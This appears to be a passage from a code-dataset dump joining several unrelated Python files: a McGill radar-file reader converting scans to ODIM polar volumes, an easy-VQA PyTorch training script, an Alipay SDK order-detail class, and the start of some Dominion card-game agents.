# mobj.logical_records[index].segments : a list of 107 McGill objects, each
# representing a segment
# @param string input file name
# @returns McGill object representing the file contents
def readMcGill(filename):
    """Read a McGill volume-scan file into a McGill container object.

    The 4096-byte header is parsed field by field, then the data section is
    read as 2048-byte logical records, each holding 107 nineteen-byte
    segments (data / elevation / end-of-data).

    NOTE(review): the file is opened in text mode and parsed with
    numpy.fromstring on str slices - this is Python-2-era code. Under
    Python 3 it would need open(filename, 'rb'), numpy.frombuffer, and
    bytes-aware indexing (record[0] is already an int on bytes). Confirm
    the target interpreter before modifying.
    """
    mobj = McGill()
    fd = open(filename)
    # Start reading header
    fd.seek(46*2)
    #mobj.dum0 = fd.read(46*2)
    mobj.number_Logical_Records = int(fromstring(fd.read(2), int16))
    fd.seek(3*2, 1)
    #mobj.dum1 = fd.read(3*2)
    mobj.Volume_Scan_Format = int(fromstring(fd.read(2), int16))
    fd.seek(5*2, 1)
    #mobj.dum2 = fd.read(2*5)
    # Acquisition end timestamp (McGill stamps the END of acquisition).
    mobj.hours = int(fromstring(fd.read(4), int32))
    mobj.minutes = int(fromstring(fd.read(4), int32))
    mobj.seconds = int(fromstring(fd.read(4), int32))
    mobj.day = int(fromstring(fd.read(4), int32))
    mobj.month = int(fromstring(fd.read(4), int32))
    mobj.year = int(fromstring(fd.read(4), int32))
    mobj.radar_Id = int(fromstring(fd.read(4), int32))
    mobj.radar_latitude = float(fromstring(fd.read(4), float32))
    mobj.radar_longitude = float(fromstring(fd.read(4), float32))
    mobj.number_elevations = int(fromstring(fd.read(4), int32))
    mobj.elevation_angles = []
    for i in range(mobj.number_elevations):
        mobj.elevation_angles.append(float(fromstring(fd.read(4), float32)))
    mobj.azimuth_offset = int(fromstring(fd.read(2), int16))
    mobj.viraq_flag = fd.read(2)
    mobj.clutter_filter = fd.read(2)
    fd.seek(315*2, 1)
    #mobj.dum3 = fd.read(315*2)
    mobj.met_param = int(fromstring(fd.read(2), int16))
    fd.seek(2 ,1)
    #mobj.dum4 = fd.read(2)
    # Linear scaling used later to convert raw bytes to physical values.
    mobj.value_offset = float(fromstring(fd.read(4), float32))
    mobj.cal_slope = float(fromstring(fd.read(4), float32))
    mobj.antenna_programme = int(fromstring(fd.read(2), int16))
    fd.seek(4, 1)
    #mobj.dum5 = fd.read(2)
    #mobj.dum6 = fd.read(2)
    mobj.cscan_format = int(fromstring(fd.read(2), int16))
    mobj.range_unfolded = int(fromstring(fd.read(2), int16))
    mobj.vad_velocity_unfolded = int(fromstring(fd.read(2), int16))
    mobj.numb_vad_unf_pts = []
    for i in range(mobj.number_elevations):
        mobj.numb_vad_unf_pts.append(int(fromstring(fd.read(2), int16)))
    mobj.numb_range_unf_pts = []
    for i in range(mobj.number_elevations):
        mobj.numb_range_unf_pts.append(int(fromstring(fd.read(2), int16)))
    mobj.range_bins_array_size = int(fromstring(fd.read(2), int16))
    fd.seek(2, 1)
    #mobj.dum7 = fd.read(2)
    mobj.shift_cscan_flag = int(fromstring(fd.read(2), int16))
    mobj.shift_speed = int(fromstring(fd.read(2), int16))
    mobj.shift_dir = int(fromstring(fd.read(2), int16))
    fd.seek(48*4, 1)
    #mobj.dum8 = fd.read(24*4)
    #mobj.dum9 = fd.read(24*4)
    mobj.vert_grad_unfolded = int(fromstring(fd.read(2), int16))
    mobj.numb_vert_grad_unf_pts = []
    for i in range(mobj.number_elevations):
        mobj.numb_vert_grad_unf_pts.append(int(fromstring(fd.read(2), int16)))
    fd.seek(12, 1)
    #mobj.dum10 = fd.read(4) # documentation says 2 bytes, but it's 4
    #mobj.dum11 = fd.read(4)
    #mobj.dum12 = fd.read(4)
    mobj.radial_grad_unfolded = int(fromstring(fd.read(2), int16))
    mobj.numb_radial_grad_unf_pts = []
    for i in range(mobj.number_elevations):
        mobj.numb_radial_grad_unf_pts.append(int(fromstring(fd.read(2), int16)))
    # Per-elevation PRFs and Nyquist/maximum range & velocity tables.
    mobj.prf1 = []
    for i in range(mobj.number_elevations):
        mobj.prf1.append(int(fromstring(fd.read(2), int16)))
    mobj.prf2 = []
    for i in range(mobj.number_elevations):
        mobj.prf2.append(int(fromstring(fd.read(2), int16)))
    mobj.nyq_range = []
    for i in range(mobj.number_elevations):
        mobj.nyq_range.append(int(fromstring(fd.read(2), int16)))
    mobj.max_range = []
    for i in range(mobj.number_elevations):
        mobj.max_range.append(int(fromstring(fd.read(2), int16)))
    mobj.nyq_vel = []
    for i in range(mobj.number_elevations):
        mobj.nyq_vel.append(float(fromstring(fd.read(4), float32)))
    mobj.max_vel = []
    for i in range(mobj.number_elevations):
        mobj.max_vel.append(float(fromstring(fd.read(4), float32)))
    mobj.usable_elv = []
    for i in range(mobj.number_elevations):
        mobj.usable_elv.append(int(fromstring(fd.read(1), uint8)))
    mobj.prev_sub_area_speed, mobj.prev_sub_area_dir = [], []
    for i in range(9):
        mobj.prev_sub_area_speed.append(int(fromstring(fd.read(2), int16)))
    for i in range(9):
        mobj.prev_sub_area_dir.append(int(fromstring(fd.read(2), int16)))
    #mobj.dum_pad = fd.read(1166*2)
    # Start reading data, by logical record
    mobj.logical_records = []
    fd.seek(HEADER_LENGTH)
    last_record = 0
    while last_record == 0:
        lr = McGill()
        record = fd.read(RECORD_LENGTH)
        # Record number is encoded base-64 across two bytes.
        lr.high = int(fromstring(record[0], uint8))
        lr.low = int(fromstring(record[1], uint8))
        lr.logical_record_number = 64 * lr.high + lr.low
        last_record = int(fromstring(record[2], uint8))
        lr.beginning_elevation_number = int(fromstring(record[3], uint8))
        lr.end_elevation_number = int(fromstring(record[4], uint8))
        lr.segstr = record[14:2047]
        lr.segments = []
        # Read SEGMENTS, each SEGMENT_LENGTH bytes long.
        segpos = 0
        for i in range(SEGMENTS):
            seg = McGill()
            this_seg = lr.segstr[segpos:segpos+SEGMENT_LENGTH]
            seg.N = int(fromstring(this_seg[0], uint8))
            # Data segment
            if 1 <= seg.N <= 30:
                seg.type = "data"
                seg.high = int(fromstring(this_seg[1], uint8))
                seg.low = int(fromstring(this_seg[2], uint8))
                # bin_number is base 0, unlike other McGill indices (base 1).
                seg.bin_number = 16 * (seg.N - 1)# + 1
                seg.radial_number = 64 * seg.high + seg.low
                seg.data = fromstring(this_seg[3:], uint8)
            # Elevation segment
            elif 31 <= seg.N <= 55:
                seg.type = "elevation"
                seg.elevation_number = seg.N - 31
                seg.elevation_angle = mobj.elevation_angles[seg.elevation_number-1]
            # End-of-data segment can be ignored
            elif seg.N == 63:
                seg.type = "eod"
            # For some reason, there are segments of type 0, which are
            # undocumented. Ignore these.
            if seg.N > 0:
                lr.segments.append(seg)
            segpos += SEGMENT_LENGTH
        mobj.logical_records.append(lr)
    fd.close()
    return mobj
## Takes the output of readMcGill and creates contiguous scans of data.
# This is done by pasting the contents of each McGill segment into the
# equivalent position in the corresponding contiguous scan.
# @param McGill object representing file contents
def makeScans(mobj):
    """Paste the per-segment ray data into contiguous per-elevation scans.

    Creates mobj.scans: one (NRAYS x 360-bin) uint8 array per elevation.
    Bins at 1 km resolution cover 0-111 km; 2 km bins (duplicated x2) cover
    112-231 km; 4 km bins (duplicated x4) cover 232+ km, so each output
    cell is nominally 1 km.

    NOTE(review): `scan` is only set by an "elevation" segment; this relies
    on the documented guarantee that elevation segments always precede data
    segments, otherwise the first data segment would hit an unbound name.
    """
    mobj.scans = []
    # Create empty arrays for each scan
    for i in range(mobj.number_elevations):
        mobj.scans.append(zeros((NRAYS, 120+(60*2)+(60*4)), uint8))
    # Populate them
    for lr in mobj.logical_records:
        for seg in lr.segments:
            # Elevation segment types always preceed data types
            if seg.type == "elevation":
                scan = seg.elevation_number -1
            elif seg.type == "data":
                ray = seg.radial_number - 1
                # Bins 112-119 are 1 km, 120-128 are 2 km, 112-135 km
                if seg.bin_number == 112:
                    part1 = seg.data[:8]
                    part2 = repeat(seg.data[8:], 2)
                    data = concatenate([part1, part2])
                    frombin = 112
                # All 2 km, 136-231 km
                elif 128 <= seg.bin_number < 176:
                    data = repeat(seg.data, 2)
                    diff = (seg.bin_number - 128) / 16.0
                    frombin = 136 + 32 * diff # 16 and 32 combo makes no sense?
                # Bins 176-179 are 2 km, 180-239 are 4 km, 232-287 km
                elif seg.bin_number == 176:
                    part1 = repeat(seg.data[:4], 2)
                    part2 = repeat(seg.data[4:], 4)
                    data = concatenate([part1, part2])
                    frombin = 232
                # All 4 km, 288- km
                elif 192 <= seg.bin_number:
                    data = repeat(seg.data, 4)
                    diff = (seg.bin_number - 192) / 32.0
                    frombin = 288 + 64 * diff # 32 and 64 combo makes no sense?
                # All 1 km, 0-111 km
                else:
                    data = seg.data
                    frombin = seg.bin_number
                tobin = int(frombin) + len(data)
                mobj.scans[scan][ray][frombin:tobin] = data
## McGill data times are the end of data acquisition. This function guestimates
# the beginning dates and times of each scan in the volume.
# @param McGill object representing file contents
def adjustTimes(mobj):
    """Guestimate per-scan start/end date-time strings.

    McGill stamps the END of the full acquisition, so this walks backwards
    by the total acquisition time (SCANT per sweep plus the inter-tilt
    esteps), then forwards again, recording start/end timestamps per scan.

    NOTE(review): time.mktime interprets the header timestamp as LOCAL
    time while time.gmtime formats UTC - if the header is already UTC
    this introduces a timezone offset. Confirm the header's timezone.
    """
    startdate, starttime, enddate, endtime = [], [], [], []
    tt = (mobj.year, mobj.month, mobj.day,
          mobj.hours, mobj.minutes, mobj.seconds, 0, 0, 0)
    # Epoch seconds at the (estimated) start of the first sweep.
    epochs = time.mktime(tt) - (sum(esteps) + SCANT*mobj.number_elevations)
    for i in range(mobj.number_elevations):
        start = time.gmtime(epochs)
        startdate.append(time.strftime("%Y%m%d", start))
        starttime.append(time.strftime("%H%M%S", start))
        epochs += SCANT
        end = time.gmtime(epochs)
        enddate.append(time.strftime("%Y%m%d", end))
        endtime.append(time.strftime("%H%M%S", end))
        epochs += esteps[i]
    mobj.startdate = startdate
    mobj.starttime = starttime
    mobj.enddate = enddate
    mobj.endtime = endtime
## Creates a PVOL from the McGill object
# @param McGill object representing file contents
# @returns BALTRAD/ODIM PVOL object
def makePVOL(mobj):
    """Build a BALTRAD/ODIM polar volume from the populated McGill object.

    One scan (with a single parameter - DBZH or VRADH, depending on
    met_param) is added per elevation; site metadata is hard-coded for
    the McGill QC radar.
    """
    pvol = _polarvolume.new()
    pvol.source = "NOD:cawmn,PLC:McGill QC"
    # ODIM stores angles in radians; dr converts from degrees.
    pvol.longitude = mobj.radar_longitude * dr
    pvol.latitude = mobj.radar_latitude * dr
    pvol.height = 76.0 # From a URP Site.conf file
    pvol.beamwidth = 0.85 * dr # From a URP Site.conf file
    pvol.date = mobj.startdate[0]
    pvol.time = mobj.starttime[0]
    pvol.addAttribute("how/simulated", "False")
    pvol.addAttribute("how/system", "McGill")
    pvol.addAttribute("how/TXtype", "klystron")
    pvol.addAttribute("how/polmode", "simultaneous-dual")
    pvol.addAttribute("how/wavelength", 10.4) # According to the McGill spec
    pvol.addAttribute("how/rpm", 6.0) # According to the McGill spec
    for i in range(mobj.number_elevations):
        scan = _polarscan.new()
        scan.elangle = mobj.elevation_angles[i] * dr
        scan.rscale = 1000.0
        scan.rstart = 0.25 # According to URP decoder
        scan.a1gate = 0 # Unknown
        scan.startdate = mobj.startdate[i]
        scan.starttime = mobj.starttime[i]
        scan.enddate = mobj.enddate[i]
        scan.endtime = mobj.endtime[i]
        scan.addAttribute("how/astart", 0.5) # According to the McGill spec
        scan.addAttribute("how/lowprf", mobj.prf1[i]) # PRFs are identical
        #scan.addAttribute("how/midprf", )
        scan.addAttribute("how/highprf", mobj.prf2[i])
        param = _polarscanparam.new()
        param.quantity = QUANTITIES[mobj.met_param] # Only DBZH and VRADH
        param.nodata = 255.0 # Unknown
        param.undetect = 0.0 # Implied
        # Physical value = gain * raw + offset (header calibration).
        param.gain = mobj.cal_slope
        param.offset = mobj.value_offset
        param.setData(mobj.scans[i])
        scan.addParameter(param)
        pvol.addScan(scan)
    return pvol
## Each PVOL contains only one moment, so merge several of these into one.
# Assume the first PVOL contains DBZH and the second VRADH.
# @param list of (two) PVOLs
# @returns PVOL object containing (both) moments per scan.
def mergePVOLs(pvols):
    """Merge two single-moment PVOLs into one.

    The first PVOL is assumed to hold DBZH and the second VRADH; each
    VRADH parameter is copied onto the matching reflectivity scan and
    the (now dual-moment) first PVOL is returned.
    """
    refl, wind = pvols
    for index in range(wind.getNumberOfScans()):
        vradh = wind.getScan(index).getParameter("VRADH")
        refl.getScan(index).addParameter(vradh)
    return refl
## Reads McGill data from file and returns a BALTRAD/ODIM PVOL object for a
# single moment
# @param string of McGill file
# @returns PVOL object containing one moment for each scan.
def file2pvol(filename):
    """Read one McGill file and convert it into a single-moment PVOL."""
    volume = readMcGill(filename)
    makeScans(volume)
    adjustTimes(volume)
    return makePVOL(volume)
## Reads McGill data from two files into a single BALTRAD/ODIM PVOL
# @param string of the McGill file containing reflectivity (DBZH)
# @param string of the McGill file containing radial wind velocity (VRADH)
# @returns PVOL object containing both moments per scan
def read(zfile, vfile):
    """Read a reflectivity (DBZH) file and a radial-wind (VRADH) file
    into a single merged BALTRAD/ODIM PVOL."""
    return mergePVOLs([file2pvol(zfile), file2pvol(vfile)])
if __name__=="__main__":
pass
| StarcoderdataPython |
1640124 | <reponame>sikaiyin/easy-VQA-Pytorch<filename>model.py
from __future__ import print_function
import argparse
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.image import load_img, img_to_array
import json
import os
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import Dataset
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
from skimage import io, transform
class Net(nn.Module):
    """CNN image encoder + bag-of-words question encoder for easy-VQA.

    Both branches are projected to a 32-dim embedding, fused by
    element-wise multiplication, and classified into 13 answer classes.
    """

    def __init__(self):
        super(Net, self).__init__()
        # Image branch. fc1's 5408 inputs equal 32 * 13 * 13, which matches
        # 64x64 RGB input through the small (big_model=False) path.
        self.conv1 = nn.Conv2d(3, 80, 3, 1)
        self.conv2 = nn.Conv2d(80, 160, 3, 1)
        self.conv3 = nn.Conv2d(160, 32, 3, 1)
        self.conv4 = nn.Conv2d(32, 32, 3, 1)
        self.maxpool1 = nn.MaxPool2d(2)
        self.maxpool2 = nn.MaxPool2d(2)
        self.maxpool3 = nn.MaxPool2d(2)
        self.fc1 = nn.Linear(5408, 32)
        # Question branch (27-dim bag-of-words vector).
        self.fcq1 = nn.Linear(27, 320)
        self.fcq2 = nn.Linear(320, 32)
        # Classifier head (13 answer classes).
        self.fc2 = nn.Linear(32, 13)
        self.fc3 = nn.Linear(13, 13)

    def forward(self, im_input, q_input, big_model):
        # Image branch.
        x1 = self.conv1(im_input)
        x1 = self.maxpool1(x1)
        x1 = self.conv2(x1)
        x1 = self.conv3(x1)
        x1 = self.maxpool2(x1)
        if big_model:
            # NOTE(review): the extra conv/pool changes the flattened size,
            # so fc1 (5408 inputs) no longer matches for 64x64 input -
            # confirm the intended resolution for the big model.
            x1 = self.conv4(x1)
            x1 = self.maxpool3(x1)
        x1 = torch.flatten(x1, 1)
        # torch.tanh replaces the deprecated torch.nn.functional.tanh.
        x1 = torch.tanh(self.fc1(x1))
        # Question branch.
        x2 = torch.tanh(self.fcq1(q_input))
        x2 = torch.tanh(self.fcq2(x2))
        # Fuse by element-wise multiplication: [batch_size, embed_size].
        combined_feature = torch.mul(x1, x2)
        pred = torch.tanh(self.fc2(combined_feature))
        pred = self.fc3(pred)
        return pred
class MyDataset(Dataset):
    """easy-VQA dataset: pairs each question (bag-of-words vector) with its
    image and the index of its answer in the global answers.txt list.

    Expects under *path*: an 'images/' directory of '<id>.png' files, a
    'questions.json' of [text, answer, image_id] triples, and
    '../answers.txt' with one answer per line.
    """

    def __init__(self, path, transform=None):
        self.root_path = path
        self.image_path = os.path.join(self.root_path, 'images')
        self.question_path = os.path.join(self.root_path, 'questions.json')
        self.texts, self.answers, self.image_ids = self.read_questions(self.question_path)
        self.img_paths = self.extract_paths(self.image_path)
        self.transform = transform
        self.all_answers = self.read_answers(os.path.join(self.root_path, '../answers.txt'))
        # Bag-of-words encoding: each question becomes a fixed-length
        # 0/1 vocabulary-presence vector.
        tokenizer = Tokenizer()
        tokenizer.fit_on_texts(self.texts)
        self.text_seqs = tokenizer.texts_to_matrix(self.texts)
        # Targets are indices into the global answer list.
        self.answer_indices = [self.all_answers.index(a) for a in self.answers]

    def read_questions(self, path):
        """Load questions.json and split it into parallel text/answer/id lists."""
        with open(path, 'r') as file:
            qs = json.load(file)
        texts = [q[0] for q in qs]
        answers = [q[1] for q in qs]
        image_ids = [q[2] for q in qs]
        return texts, answers, image_ids

    def read_answers(self, path):
        """Return the list of all possible answers, one per stripped line."""
        with open(path, 'r') as file:
            all_answers = [a.strip() for a in file]
        return all_answers

    def extract_paths(self, dirctory):
        """Map integer image ids to the .png file paths in *dirctory*."""
        paths = {}
        for filename in os.listdir(dirctory):
            if filename.endswith('.png'):
                image_id = int(filename[:-4])
                paths[image_id] = os.path.join(dirctory, filename)
        return paths

    def __len__(self):
        return len(self.answers)

    def __getitem__(self, idx):
        """Return ({'image', 'question'}, answer-index) for sample *idx*."""
        if torch.is_tensor(idx):
            idx = idx.tolist()
        image = img_to_array(load_img(self.img_paths[self.image_ids[idx]]))
        if self.transform:
            image = self.transform(image)
        sample = {'image': image, 'question': torch.Tensor(self.text_seqs[idx])}
        target = torch.LongTensor([self.answer_indices[idx]])
        return sample, target
def train(args, model, device, train_loader, optimizer, epoch):
    """Run one training epoch, logging loss/accuracy every log_interval batches.

    NOTE(review): `correct_train` is reset every batch, so the printed
    "Accuracy" is the fraction correct for the *current batch only* (and is
    a fraction, not a percentage, despite the '%' sign). The loss module is
    also re-created per batch; hoisting it out would be equivalent.
    """
    model.train()
    for batch_idx, (sample, label) in enumerate(train_loader):
        correct_train = 0
        img, ques, target = sample['image'].to(device), sample['question'].to(device), label.to(device)
        # Flatten targets from [batch, 1] to [batch] for CrossEntropyLoss.
        target = target.view(ques.shape[0])
        optimizer.zero_grad()
        output = model(img, ques, False)
        NLL = nn.CrossEntropyLoss()
        loss = NLL(output, target)
        pred = output.argmax(dim=1, keepdim=True)  # get the index of the max log-probability
        correct_train += pred.eq(target.view_as(pred)).sum().item()
        loss.backward()
        optimizer.step()
        if batch_idx % args.log_interval == 0:
            print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\n'.format(
                epoch, batch_idx * len(ques), len(train_loader.dataset),
                100. * batch_idx / len(train_loader), loss.item()))
            print("Accuracy: {}%\n".format(correct_train / len(ques)))
def test(model, device, test_loader):
    """Evaluate the model on the test set and print average loss + accuracy.

    NOTE(review): per-batch *mean* losses are summed and then divided by the
    dataset size, so the reported "Average loss" is scaled down by the batch
    size; dividing by len(test_loader) (number of batches) or using
    reduction='sum' would give the true per-sample average.
    """
    model.eval()
    test_loss = 0
    correct = 0
    with torch.no_grad():
        for batch_idx, (sample, label) in enumerate(test_loader):
            img, ques, target = sample['image'].to(device), sample['question'].to(device), label.to(device)
            target = target.view(ques.shape[0])
            output = model(img, ques, False)
            NLL = nn.CrossEntropyLoss()
            test_loss += NLL(output, target).item()  # sum up batch loss
            pred = output.argmax(dim=1, keepdim=True)  # get the index of the max log-probability
            correct += pred.eq(target.view_as(pred)).sum().item()
    test_loss /= len(test_loader.dataset)
    print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
        test_loss, correct, len(test_loader.dataset),
        100. * correct / len(test_loader.dataset)))
def main():
    """Parse CLI arguments, build datasets/loaders, then train and evaluate."""
    # Training settings
    parser = argparse.ArgumentParser(description='PyTorch Easy-VQA Example')
    parser.add_argument('--batch-size', type=int, default=64, metavar='N',
                        help='input batch size for training (default: 64)')
    parser.add_argument('--test-batch-size', type=int, default=64, metavar='N',
                        help='input batch size for testing (default: 64)')
    parser.add_argument('--epochs', type=int, default=10, metavar='N',
                        help='number of epochs to train (default: 10)')
    parser.add_argument('--lr', type=float, default=1e-4, metavar='LR',
                        help='learning rate (default: 1e-4)')
    parser.add_argument('--gamma', type=float, default=0.1, metavar='M',
                        help='Learning rate step gamma (default: 0.1)')
    parser.add_argument('--dry-run', action='store_true', default=False,
                        help='quickly check a single pass')
    parser.add_argument('--seed', type=int, default=1, metavar='S',
                        help='random seed (default: 1)')
    parser.add_argument('--gpu', default=False,
                        help='GPU usage (default: False))')
    parser.add_argument('--log-interval', type=int, default=10, metavar='N',
                        help='how many batches to wait before logging training status')
    parser.add_argument('--save-model', action='store_true', default=True,
                        help='For Saving the current Model')
    args = parser.parse_args()
    torch.manual_seed(args.seed)
    device = torch.device('cuda' if (torch.cuda.is_available() and args.gpu) else 'cpu')
    # BUG FIX: the original passed num_workers=4 explicitly to DataLoader AND
    # (on CUDA machines) num_workers=1 inside the kwargs dict, which raises
    # "got multiple values for keyword argument 'num_workers'".  Keep a single
    # source of truth in the kwargs dicts.
    train_kwargs = {'batch_size': args.batch_size, 'num_workers': 4}
    test_kwargs = {'batch_size': args.test_batch_size, 'num_workers': 4}
    # Gate on the *selected* device, not mere CUDA availability, so pinning is
    # only requested when tensors actually go to the GPU.
    if device.type == 'cuda':
        train_kwargs['pin_memory'] = True
        test_kwargs['pin_memory'] = True
    transform = transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize((0.90441555, 0.90574956, 0.89646965), (0.19336925, 0.18681642, 0.20578428))
    ])
    dataset1 = MyDataset('./data/train', transform)
    dataset2 = MyDataset('./data/test', transform)
    # BUG FIX: shuffle the training set each epoch; evaluation order stays fixed.
    train_loader = torch.utils.data.DataLoader(dataset1, shuffle=True, **train_kwargs)
    test_loader = torch.utils.data.DataLoader(dataset2, shuffle=False, **test_kwargs)
    print("The length of train_loader is {}, and test_loader is {}".format(len(train_loader), len(test_loader)))
    model = Net().to(device)
    # BUG FIX: honour the --lr command-line option (it was parsed but unused).
    optimizer = optim.Adam(model.parameters(), lr=args.lr)
    scheduler = StepLR(optimizer, step_size=1, gamma=args.gamma)
    for epoch in range(1, args.epochs + 1):
        train(args, model, device, train_loader, optimizer, epoch)
        test(model, device, test_loader)
        scheduler.step()
    if args.save_model:
        torch.save(model.state_dict(), "model.pt")


if __name__ == '__main__':
    main()
| StarcoderdataPython |
366292 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.ExtendParams import ExtendParams
from alipay.aop.api.domain.GoodsDetail import GoodsDetail
from alipay.aop.api.domain.SettleInfo import SettleInfo
from alipay.aop.api.domain.SubMerchant import SubMerchant
def _plain_property(name):
    """Return a pass-through property for *name* backed by the '_<name>' slot."""
    attr = '_' + name

    def _get(self):
        return getattr(self, attr)

    def _set(self, value):
        setattr(self, attr, value)

    return property(_get, _set)


class OrderDetail(object):
    """Order-detail payload for Alipay OpenAPI requests.

    Mirrors the auto-generated SDK value objects: every field is a property,
    nested objects are coerced from plain dicts on assignment, and
    (de)serialisation goes through ``to_alipay_dict`` / ``from_alipay_dict``.
    The original hand-expanded boilerplate is replaced by a field table; the
    public interface (all properties, both methods) is unchanged.
    """

    # All field/property names, in serialisation order.
    _FIELDS = (
        'app_id', 'body', 'extend_params', 'goods_detail', 'out_trade_no',
        'passback_params', 'product_code', 'seller_id', 'seller_logon_id',
        'settle_info', 'show_url', 'sub_merchant', 'subject', 'total_amount',
    )

    def __init__(self):
        # Every backing slot starts unset.
        for name in self._FIELDS:
            setattr(self, '_' + name, None)

    # --- plain pass-through fields -------------------------------------
    app_id = _plain_property('app_id')
    body = _plain_property('body')
    out_trade_no = _plain_property('out_trade_no')
    passback_params = _plain_property('passback_params')
    product_code = _plain_property('product_code')
    seller_id = _plain_property('seller_id')
    seller_logon_id = _plain_property('seller_logon_id')
    show_url = _plain_property('show_url')
    subject = _plain_property('subject')
    total_amount = _plain_property('total_amount')

    # --- fields converted through domain classes on assignment ---------
    # (the converter classes are referenced lazily, inside the setters,
    # exactly as the generated code did)
    @property
    def extend_params(self):
        return self._extend_params

    @extend_params.setter
    def extend_params(self, value):
        if isinstance(value, ExtendParams):
            self._extend_params = value
        else:
            self._extend_params = ExtendParams.from_alipay_dict(value)

    @property
    def settle_info(self):
        return self._settle_info

    @settle_info.setter
    def settle_info(self, value):
        if isinstance(value, SettleInfo):
            self._settle_info = value
        else:
            self._settle_info = SettleInfo.from_alipay_dict(value)

    @property
    def sub_merchant(self):
        return self._sub_merchant

    @sub_merchant.setter
    def sub_merchant(self, value):
        if isinstance(value, SubMerchant):
            self._sub_merchant = value
        else:
            self._sub_merchant = SubMerchant.from_alipay_dict(value)

    @property
    def goods_detail(self):
        return self._goods_detail

    @goods_detail.setter
    def goods_detail(self, value):
        # NOTE: non-list input is silently ignored (attribute stays None),
        # matching the generated-SDK behaviour.
        if isinstance(value, list):
            self._goods_detail = [
                i if isinstance(i, GoodsDetail) else GoodsDetail.from_alipay_dict(i)
                for i in value
            ]

    def to_alipay_dict(self):
        """Serialise all truthy fields to a plain dict.

        Unlike the generated original, this does NOT mutate ``goods_detail``
        in place while serialising.
        """
        params = dict()
        for name in self._FIELDS:
            value = getattr(self, name)
            if not value:
                continue
            if isinstance(value, list):
                value = [item.to_alipay_dict() if hasattr(item, 'to_alipay_dict') else item
                         for item in value]
            elif hasattr(value, 'to_alipay_dict'):
                value = value.to_alipay_dict()
            params[name] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build an OrderDetail from a plain dict; returns None for empty input."""
        if not d:
            return None
        o = OrderDetail()
        for name in OrderDetail._FIELDS:
            if name in d:
                # Assignment goes through the properties, so nested objects
                # are converted by their setters.
                setattr(o, name, d[name])
        return o
| StarcoderdataPython |
366406 | import string
import numpy
import copy
from domrl.engine.agent import Agent
"""
class Agent(object):
def choose(self, decision, state):
return decision.moves[0]
class StdinAgent(Agent):
def choose(self, decision, state):
# Autoplay
if len(decision.moves) == 1:
return [0]
player = decision.player
print(f" ==== Decision to be made by {player} ==== ")
print(f"Actions: {player.actions} | Buys: {player.buys} | Coins: {player.coins}")
print("Hand: ", list(map(str, player.hand)))
print(decision.prompt)
for idx, move in enumerate(decision.moves):
print(f"{idx}: {move}")
# Get user input and process it.
while True:
user_input = input()
if user_input == "?":
state.event_log.print(player)
print(state)
else:
try:
ans = list(map(lambda x: int(x.strip()), user_input.split(',')))
except:
print('Clearly invalid input. Please try again.')
continue
break
return ans
class APIAgent(Agent):
def choose(self, decision, state):
# Autoplay
# if len(decision.moves) == 1:
# return [0]
player = decision.player
actions = player.actions
buys = player.buys
coins = player.coins
moves = decision.moves
hand = player.hand
state
while True:
user_input = input()
if user_input == "?":
state.event_log.print(player)
print(state)
else:
ans = list(map(lambda x: int(x.strip()), user_input.split(',')))
break
return ans
"""
class RandomAgent(Agent):
    """Agent that chooses uniformly random legal moves.

    Fixes two defects in the original:
    * the chapel ('Trash up to 4') branch ran before the empty-moves guard,
      so ``numpy.random.randint`` could be called with an empty range;
    * the militia ('Discard down to 3') rejection-sampling loop spun forever
      whenever more distinct indices were needed than moves exist.
    """

    @staticmethod
    def _sample_indices(n_moves, k):
        """Return up to *k* distinct random indices from range(*n_moves*)."""
        k = min(k, n_moves)  # cap so sampling without replacement cannot hang
        return [int(i) for i in numpy.random.choice(n_moves, size=k, replace=False)]

    def policy(self, decision, state):
        n_moves = len(decision.moves)
        if n_moves == 0:
            return []
        if 'Trash up to 4' in decision.prompt:  # chapel: trash 0..4 random cards
            limit = min(n_moves, 4)
            k = int(numpy.random.randint(0, limit + 1))
            return self._sample_indices(n_moves, k)
        if 'Discard down to 3 cards' in decision.prompt:  # militia attack
            k = max(len(decision.player.hand) - 3, 0)
            return self._sample_indices(n_moves, k)
        # Default: one uniformly random move.
        return [int(numpy.random.randint(0, n_moves))]
class PassOnBuySemiAgent(Agent):
    """Semi-agent that short-circuits every Buy decision by choosing move 0.

    Non-Buy decisions fall through (implicit None) so a later agent decides.
    """
    def policy(self, decision, state):
        # Index 0 is presumably the "pass"/skip option -- TODO confirm against
        # the engine's move ordering.
        if 'Buy' in decision.prompt:
            return [0]
class CleverAgentOld(Agent):
    """Wrapper agent: prunes Curse buys, auto-plays +action/treasure moves.

    Any remaining choice is delegated to the wrapped agent, and the chosen
    index is mapped back onto the original (unpruned) move list by string
    comparison.
    """
    def __init__(self, agent):
        # agent: fallback Agent consulted when no automatic move applies.
        self.agent = agent

    def policy(self, decision, state):
        initialDecision = copy.deepcopy(decision)
        # Automove If One Move
        if len(decision.moves) == 1:
            return [0]
        for idx in range(0, len(initialDecision.moves)):
            move = initialDecision.moves[idx]
            if "Buy: Curse" in move.__str__():
                # NOTE(review): popping while iterating shifts later indices of
                # decision.moves relative to initialDecision.moves.
                decision.moves.pop(idx)
            # Auto-take moves that add actions, or treasures during a
            # treasure-playing prompt.
            if hasattr(move, "card") and (
                    move.card.add_actions > 0 or ("treasure" in decision.prompt.lower() and move.card.coins > 0)):
                return self.restrictDecision(decision.moves, initialDecision.moves, idx)
        restrictedChoice = self.agent.policy(decision, state)
        return self.restrictDecision(decision.moves, initialDecision.moves, restrictedChoice[0])

    def restrictDecision(self, moves, initialMoves, chosen):
        # Translate index *chosen* (into the pruned `moves` list) back into an
        # index into `initialMoves`, matching moves by their string form.
        for idx in range(0, len(initialMoves)):
            if str(initialMoves[idx]) == str(moves[chosen]):
                return list([idx])
        return [chosen]
class RulesSemiAgent(Agent):
    """Semi-agent meant to strip Bandit/Remodel moves (author-marked broken).

    Falls through (returns None) for multi-move decisions so a later agent
    can decide.
    """
    def policy(self, decision, state):
        # Automove If One Move
        if len(decision.moves) == 1:
            return [0]
        for idx in range(0, len(decision.moves)):
            try:
                move = decision.moves[idx]
